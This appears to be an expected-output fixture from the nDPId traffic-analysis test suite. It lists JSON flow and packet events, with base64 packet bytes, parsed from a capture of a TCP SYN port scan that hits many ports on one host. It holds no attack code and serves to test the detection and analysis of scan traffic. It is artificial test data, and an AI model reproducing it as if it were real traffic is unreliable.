+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsY2AAADUGsBKsEAAIQA2GNIzSatvdUoMYAAAAAGACCADFswAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAss00AACYGbyWsEAAIQA2GNIzSBi\/dUoMYAAAAAGACDAAmYAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAADsG2V2sEAAIQA2GNIzSGbTdUoMYAAAAAGACEAAO2wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsz7wAACUGU7asEAAIQA2GNIzSC7ndUoMYAAAAAGACCAAk1gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAsAdoAACsGG5msEAAIQA2GNIzSCI7dUoMYAAAAAGACEAAgAQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAs2W4AACcGSASsEAAIQA2GNIzSwAPdUoMYAAAAAGACEABoiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SEAACsGQFGsEAAIQA2GNIzTCzXdU4MZAAAAAGACEAAdVwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsJv0AADkG6HWsEAAIQA2GNIzTAfHdU4MZAAAAAGACCAAumwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWIAADEGuhCsEAAIQA2GNIzT8FzdU4MZAAAAAGACCABALwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw9gAACsGWZqsEAAIQA2GNIzTCDrdU4MZAAAAAGACEAAgUgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs6AwAADoGJmasEAAIQA2GNIzTBDHdU4MZAAAAAGACDAAoWwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs5F4AACoGOhSsEAAIQA2GNIzTNJDdU4MZAAAAAGACDAD3+wAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsRG4AADsGyQSsEAAIQA2GNIzTPSzdU4MZAAAAAGACEADrXwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"synscan.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsZD8AADMGsTOsEAAIQA2GNIzTNrDdU4MZAAAAAGACEADx2wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"synscan.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsqbQAADoGZL6sEAAIQA2GNIzTJRzdU4MZAAAAAGACDAAHcAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsdUEAADIGoTGsEAAIQA2GNIzTAandU4MZAAAAAGACDAAq4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5959,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"synscan.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAssN0AACoGbZWsEAAIQA2GNIzTF0fdU4MZAAAAAGACDAAVRQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"synscan.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsrmsAACwGbgesEAAIQA2GNIzSHUjdUoMYAAAAAGACBAAXRwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs2\/QAADYGNn6sEAAIQA2GNIzSBC\/dUoMYAAAAAGACDAAoYAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"synscan.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsEvoAADIGA3msEAAIQA2GNIzSd\/7dUoMYAAAAAGACDAC0kAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"synscan.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsK3gAADkG4\/qsEAAIQA2GNIzSAyjdUoMYAAAAAGACCAAtZwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsU\/gAACsGyXqsEAAIQA2GNIzSGY\/dUoMYAAAAAGACEAAPAAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAsr1oAADIGZxisEAAIQA2GNIzSC\/\/dUoMYAAAAAGACDAAgkAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"synscan.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058346,"pkt":"ACYLMQczACWzv5HuCABFAAAs4hsAACUGQVesEAAIQA2GNIzSE6ndUoMYAAAAAGACCAAc5gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058346,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 